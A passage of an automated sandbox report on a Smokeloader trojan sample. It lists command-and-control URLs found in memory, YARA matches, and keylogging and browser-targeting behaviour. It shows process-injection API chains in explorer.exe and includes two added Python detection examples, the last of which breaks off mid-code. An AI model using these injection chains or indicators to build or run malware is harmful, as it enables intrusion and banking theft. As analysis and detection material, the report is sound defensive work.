                    Source: explorer.exe, 00000001.00000000.1728897911.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1727291889.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                    Source: explorer.exe, 00000001.00000000.1728897911.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1727291889.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                    Source: explorer.exe, 00000001.00000000.1728897911.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1727291889.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: explorer.exe, 00000001.00000000.1728897911.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1727291889.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                    Source: explorer.exe, 00000001.00000000.1727291889.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                    Source: explorer.exe, 00000006.00000002.1956613264.0000000003228000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.1956613264.0000000003294000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/
                    Source: explorer.exe, 00000006.00000002.1956613264.0000000003294000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/=
                    Source: explorer.exe, 00000006.00000002.1956613264.0000000003294000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0
                    Source: explorer.exe, 00000006.00000002.1956613264.0000000003250000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.1956613264.0000000003228000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.1944673317.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.1955894344.0000000002F57000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2944561786.0000000000698000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2127081102.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2944628748.0000000002E77000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2943892684.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2944692360.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2943579031.00000000004E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://prolinice.ga/index.php
                    Source: explorer.exe, 00000006.00000002.1956613264.0000000003228000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.1944673317.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.1955894344.0000000002F57000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2944561786.0000000000698000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2127081102.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2944628748.0000000002E77000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2943892684.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2944692360.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2943579031.00000000004E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://prolinice.ga/index.phpMozilla/5.0
                    Source: explorer.exe, 00000006.00000002.1956613264.000000000327F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://prolinice.ga/ndex.php
                    Source: explorer.exe, 00000006.00000002.1956613264.0000000003294000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://prolinice.ga:80/index.php

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: Yara match | File source: 0000000B.00000002.2941664607.0000000000841000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000F.00000002.2941442653.0000000000F71000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: explorer.exe PID: 7740, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: explorer.exe PID: 7840, type: MEMORYSTR
                    Source: Yara match | File source: 171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe, type: SAMPLE
                    Source: Yara match | File source: 0.2.171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.0.171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.rrrrcve.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.0.rrrrcve.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.1743449635.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000002.1970433561.0000000001FC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1742950739.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000002.1970165138.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: C:\Users\user\AppData\Roaming\rrrrcve, type: DROPPED
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 16_2_006D162B GetKeyboardState,ToUnicode

                    E-Banking Fraud

                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_00382EA8 StrStrIA, chrome.exe|opera.exe|msedge.exe
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_00383862 GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Sleep (the same function is reported four times, once for each of the strings firefox.exe, iexplore.exe, microsoftedgecp.exe and chrome.exe)

                    System Summary

                    Source: 00000000.00000002.1743449635.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                    Source: 00000005.00000002.1970433561.0000000001FC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                    Source: 00000000.00000002.1742950739.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                    Source: 00000005.00000002.1970165138.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                    Source: 171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: rrrrcve.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeCode function: 0_2_004014BF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014BF
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeCode function: 0_2_00402321 NtQuerySystemInformation,NtQueryInformationProcess,0_2_00402321
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeCode function: 0_2_004025D3 NtClose,0_2_004025D3
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeCode function: 0_2_004014D6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014D6
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeCode function: 0_2_004022D8 NtQuerySystemInformation,NtQueryInformationProcess,0_2_004022D8
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeCode function: 0_2_004022D9 NtQuerySystemInformation,NtQueryInformationProcess,0_2_004022D9
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeCode function: 0_2_004022E5 NtQuerySystemInformation,NtQueryInformationProcess,0_2_004022E5
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeCode function: 0_2_004014E8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014E8
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeCode function: 0_2_004014EB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014EB
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeCode function: 0_2_004022F7 NtQuerySystemInformation,NtQueryInformationProcess,0_2_004022F7
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeCode function: 0_2_00402686 NtClose,0_2_00402686
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_03004B92 RtlMoveMemory,NtUnmapViewOfSection,6_2_03004B92
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_030033C3 NtQueryInformationFile,6_2_030033C3
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_0300342B NtQueryObject,NtQueryObject,RtlMoveMemory,6_2_0300342B
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_0300349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle,6_2_0300349B
                    Source: C:\Windows\explorer.exeCode function: 7_2_009838B0 NtUnmapViewOfSection,7_2_009838B0
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 8_2_00831016 RtlMoveMemory,NtUnmapViewOfSection,8_2_00831016
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_00383D8D RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,9_2_00383D8D
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_00382E1B OpenProcess,lstrcmpiA,NtQueryInformationProcess,NtQueryInformationProcess,StrStrIW,9_2_00382E1B
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_00381FE5 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,9_2_00381FE5
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_00381F4E NtCreateSection,NtMapViewOfSection,9_2_00381F4E
                    Source: C:\Windows\explorer.exeCode function: 10_2_00CA5300 RtlAllocateHeap,NtUnmapViewOfSection,10_2_00CA5300
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00841016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,FindCloseChangeNotification,Sleep,11_2_00841016
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00841A80 NtCreateSection,NtMapViewOfSection,11_2_00841A80
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 11_2_00841819 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle
Source: C:\Windows\explorer.exe | Code function: 15_2_00F7355C RtlAllocateHeap,NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 16_2_006D1016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,FindCloseChangeNotification,Sleep
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 16_2_006D1B26 NtCreateSection,NtMapViewOfSection
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 16_2_006D18BF OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle
Source: C:\Windows\explorer.exe | Code function: 17_2_0043370C RtlAllocateHeap,NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 6_2_03002198
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 6_2_0301B35C
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 6_2_0300C2F9
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 6_2_03054438
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 6_2_0301B97E
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 6_2_03025F08
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 6_2_03006E6A
Source: C:\Windows\explorer.exe | Code function: 7_2_00981E20
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 8_2_0083170B
Source: C:\Windows\explorer.exe | Code function: 10_2_00CA2C00
Source: C:\Windows\explorer.exe | Code function: 15_2_00F72860
Source: C:\Windows\explorer.exe | Code function: 15_2_00F72054
Source: C:\Windows\explorer.exe | Code function: 17_2_004320F4
Source: C:\Windows\explorer.exe | Code function: 17_2_00432A04
Source: C:\Windows\SysWOW64\explorer.exe | Code function: String function: 03007F70 appears 31 times
Source: C:\Windows\SysWOW64\explorer.exe | Code function: String function: 03008801 appears 38 times
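The per-function API lists above (OpenProcess, NtUnmapViewOfSection, WriteProcessMemory, CreateRemoteThread in one function; NtCreateSection and NtMapViewOfSection in another; the Toolhelp32 walk in a third) are what the injection, hollowing and process-enumeration signatures are built on. The following is an added example, not part of the Joe Sandbox report and not a Joe Sandbox signature: it reads rows in this report's own "Code function: <id> <api>,<api>,..." shape and tags each function with the behaviour its API set implies. The rule table and the tag names are my own assumptions; the sample rows are copied from the report, including the repeated function id that raw rows carry as link text after the last API.

```python
"""Tag sandbox-reported API call chains with the behaviour they imply.

Added example, not part of the Joe Sandbox report. It reads lines in the
report's own "Code function: <id> <api>,<api>,..." shape and matches each
function's API set against a small rule table (the rule table and tag names
are my own assumptions, not a Joe Sandbox signature set).
"""
import re

# Each rule lists the APIs that must ALL occur in one function's chain.
# Order is deliberately ignored: the report lists calls by code address, not
# by execution order, so sequence-sensitive logic would need an API trace.
RULES = {
    "remote_thread_injection": {"OpenProcess", "WriteProcessMemory", "CreateRemoteThread"},
    "section_mapping_injection": {"NtCreateSection", "NtMapViewOfSection"},
    "unmap_section_view": {"NtUnmapViewOfSection"},
    "process_enumeration": {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"},
    "mutex_guard": {"CreateMutexA", "GetLastError"},
    "dynamic_api_resolution": {"GetModuleHandleA", "GetProcAddress"},
}

FUNC_ID = r"\d+_\d+_[0-9A-Fa-f]+"          # e.g. 11_2_00841819 (pid_dump_address)


def parse_chain(line):
    """Return (function_id, [apis]) or None when the row carries no API list."""
    m = re.search(r"Code function:\s*(" + FUNC_ID + r")\s+(\S+)", line)
    if not m:
        return None
    fid, rest = m.group(1), m.group(2)
    # Raw report rows repeat the function id as link text after the last API.
    apis = [t for t in rest.split(",") if t and not re.fullmatch(FUNC_ID, t)]
    return (fid, apis) if apis else None


def classify(apis):
    """All rule names whose required API set is contained in this chain."""
    present = set(apis)
    return sorted(name for name, needed in RULES.items() if needed <= present)


def analyse(report_lines):
    """Map function id -> matched tags, keeping only functions that match."""
    tagged = {}
    for line in report_lines:
        parsed = parse_chain(line)
        if parsed is None:
            continue
        fid, apis = parsed
        tags = classify(apis)
        if tags:
            tagged[fid] = tags
    return tagged


# Constructed input: rows copied from the report (one per function).
SAMPLE_ROWS = [
    r"Source: C:\Windows\SysWOW64\explorer.exe | Code function: 11_2_00841819 "
    "lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,"
    "NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,"
    "CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,"
    "ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,"
    "WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,"
    "CloseHandle,11_2_00841819",
    r"Source: C:\Windows\explorer.exe | Code function: 15_2_00F7355C RtlAllocateHeap,NtUnmapViewOfSection,15_2_00F7355C",
    r"Source: C:\Windows\SysWOW64\explorer.exe | Code function: 16_2_006D1B26 NtCreateSection,NtMapViewOfSection,16_2_006D1B26",
    r"Source: C:\Windows\SysWOW64\explorer.exe | Code function: 8_2_0083274A CreateToolhelp32Snapshot,Process32First,lstrcmpiA,Process32Next,FindCloseChangeNotification,8_2_0083274A",
    r"Source: C:\Windows\SysWOW64\explorer.exe | Code function: 6_2_03002198",
    r"Source: C:\Windows\SysWOW64\explorer.exe | Code function: String function: 03007F70 appears 31 times",
]

if __name__ == "__main__":
    for fid, tags in analyse(SAMPLE_ROWS).items():
        print(fid, ", ".join(tags))
```

Function 11_2_00841819 collects four tags at once (dynamic API resolution, a mutex check, remote-thread injection and a section unmap), which is the combination that makes it the injector rather than a generic helper; the rows that list only an address, and the string-function rows, are skipped. Because the sandbox lists calls in address order, a rule that needed OpenProcess to come before WriteProcessMemory would be wrong here; set containment is the honest level of precision for this input.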
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7716 -s 700
Source: rrrrcve.1.dr | Static PE information: No import functions for PE file found
Source: 171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe | Static PE information: No import functions for PE file found
Source: 171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 00000000.00000002.1743449635.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.1970433561.0000000001FC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1742950739.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.1970165138.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rrrrcve.1.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rrrrcve.1.dr | Static PE information: Section .text
Source: 171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe | Static PE information: Section .text
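The three static findings in this group (no import directory, RELOCS_STRIPPED in the file characteristics, and a .text section flagged IMAGE_SCN_MEM_WRITE as well as IMAGE_SCN_MEM_EXECUTE) come straight from the PE headers. The following is an added example, not part of the Joe Sandbox report: it parses just enough of a PE file to reproduce those checks, and because no binary from the report can be embedded here, it builds two constructed header-only PE32 blobs as input, one with the sample's characteristics and one with a normal layout. The blob builder and the finding strings are my own; the constant values are the documented PE header bits.

```python
"""Static PE checks behind "no import functions" and "writeable .text".

Added example, not part of the Joe Sandbox report. It parses just enough of
the PE header to reproduce three of the report's static findings, and builds
two constructed header-only PE32 blobs (no real code) to run the checks on.
"""
import struct

# IMAGE_FILE_HEADER.Characteristics bits named in the report
IMAGE_FILE_RELOCS_STRIPPED = 0x0001
IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002
IMAGE_FILE_LINE_NUMS_STRIPPED = 0x0004
IMAGE_FILE_LOCAL_SYMS_STRIPPED = 0x0008
IMAGE_FILE_32BIT_MACHINE = 0x0100
# IMAGE_SECTION_HEADER.Characteristics bits named in the report
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

FILE_HDR = "<HHIIIHH"          # Machine, NumberOfSections, TimeDateStamp, PtrSymTab, NumSyms, SizeOfOptionalHeader, Characteristics
SECTION_HDR = "<8sIIIIIIHHI"   # Name, VirtualSize, VirtualAddress, SizeOfRawData, PtrRawData, reloc/linenum ptrs and counts, Characteristics


def parse_pe(data):
    """Return file characteristics, import directory size and section flags."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("bad PE signature")
    fh = e_lfanew + 4
    _machine, nsec, _, _, _, opt_size, file_chars = struct.unpack_from(FILE_HDR, data, fh)
    opt = fh + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    pe32 = magic == 0x10B                        # 0x20B would be PE32+
    nrva = struct.unpack_from("<I", data, opt + (92 if pe32 else 108))[0]
    dd = opt + (96 if pe32 else 112)             # first data directory entry
    import_size = struct.unpack_from("<II", data, dd + 8 * 1)[1] if nrva > 1 else 0
    sections = []
    for i in range(nsec):
        fields = struct.unpack_from(SECTION_HDR, data, opt + opt_size + 40 * i)
        sections.append((fields[0].rstrip(b"\x00").decode("ascii", "replace"), fields[-1]))
    return {"file_chars": file_chars, "import_size": import_size, "sections": sections}


def static_findings(data):
    """The report's three static signatures, as plain strings."""
    pe = parse_pe(data)
    findings = []
    if pe["import_size"] == 0:
        findings.append("no import directory: APIs are resolved at run time or the file is packed")
    if pe["file_chars"] & IMAGE_FILE_RELOCS_STRIPPED:
        findings.append("RELOCS_STRIPPED: image cannot be rebased, so ASLR does not apply")
    wx = IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE
    for name, chars in pe["sections"]:
        if chars & wx == wx:
            findings.append(f"section {name} is writable and executable (self-modifying code)")
    return findings


def build_pe(sections, file_chars, import_size):
    """Construct a header-only PE32 blob (constructed test input, not a real binary)."""
    e_lfanew = 0x40
    dos = b"MZ" + bytes(0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_size = 224                               # PE32 optional header incl. 16 data directories
    file_hdr = struct.pack(FILE_HDR, 0x014C, len(sections), 0, 0, 0, opt_size, file_chars)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)        # PE32 magic
    struct.pack_into("<I", opt, 92, 16)          # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8, 0x3000 if import_size else 0, import_size)
    secs = b"".join(
        struct.pack(SECTION_HDR, name.ljust(8, b"\x00"), 0x1000, 0x1000 * (i + 1),
                    0x200, 0x400 + 0x200 * i, 0, 0, 0, 0, chars)
        for i, (name, chars) in enumerate(sections))
    return dos + b"PE\x00\x00" + file_hdr + bytes(opt) + secs


# Constructed inputs: one mirrors the report's sample, one is a normal layout.
SUSPECT = build_pe(
    [(b".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)],
    IMAGE_FILE_RELOCS_STRIPPED | IMAGE_FILE_EXECUTABLE_IMAGE | IMAGE_FILE_LINE_NUMS_STRIPPED
    | IMAGE_FILE_LOCAL_SYMS_STRIPPED | IMAGE_FILE_32BIT_MACHINE,
    import_size=0)
NORMAL = build_pe(
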